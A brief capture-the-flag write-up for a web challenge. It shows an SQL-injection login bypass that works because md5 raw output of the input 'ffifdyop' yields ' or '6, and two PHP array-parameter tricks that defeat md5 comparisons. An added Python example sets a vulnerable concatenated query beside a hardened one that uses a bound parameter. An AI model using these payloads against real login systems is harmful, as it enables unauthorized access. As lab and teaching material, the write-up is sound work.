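Intercepting the traffic reveals a hint:
select * from 'admin' where password=md5($pass,true)
Bypass it with ffifdyop.
With the second argument set to true, md5() returns the raw digest bytes instead of hex. The md5 of the string ffifdyop is 276f722736c95d99e921722cf9ed621c, which, converted to a string, is ' or '6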
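Why the raw digest changes the hinted query, and how the same input behaves against a hex digest with a bound parameter, as an added example (not part of the original writeup or the challenge's code). It uses Python's sqlite3 in place of the challenge's PHP/MySQL backend; the table contents and function names are constructed for illustration.

```python
import hashlib
import sqlite3


def raw_md5(password: str) -> bytes:
    """Equivalent of PHP md5($pass, true): the 16 raw digest bytes."""
    return hashlib.md5(password.encode()).digest()


def make_db() -> sqlite3.Connection:
    # Constructed data: one admin row holding the hex digest of a sample password.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (password TEXT)")
    db.execute("INSERT INTO admin VALUES (?)",
               (hashlib.md5(b"correct horse").hexdigest(),))
    return db


def login_vulnerable(db: sqlite3.Connection, password: str) -> bool:
    # Mirrors the hinted query: the raw digest is pasted between quotes, so a
    # digest that contains a quote byte changes the structure of the statement.
    digest = raw_md5(password).decode("latin-1")
    sql = "SELECT * FROM admin WHERE password='" + digest + "'"
    return db.execute(sql).fetchone() is not None


def login_hardened(db: sqlite3.Connection, password: str) -> bool:
    # Hex digest (characters 0-9a-f only) passed as a bound parameter:
    # the value is never parsed as SQL.
    digest = hashlib.md5(password.encode()).hexdigest()
    cur = db.execute("SELECT * FROM admin WHERE password = ?", (digest,))
    return cur.fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(raw_md5("ffifdyop"))                   # raw bytes as placed in the query
    print(login_vulnerable(db, "ffifdyop"))      # condition collapses to true
    print(login_hardened(db, "ffifdyop"))        # treated as an ordinary wrong password
    print(login_hardened(db, "correct horse"))   # legitimate login still works
```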
In the page source:
<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.
-->
Construct:
?a[]=1a&b[]=2
Send via POST:
param1[]=1&param2[]=2
This yields the flag.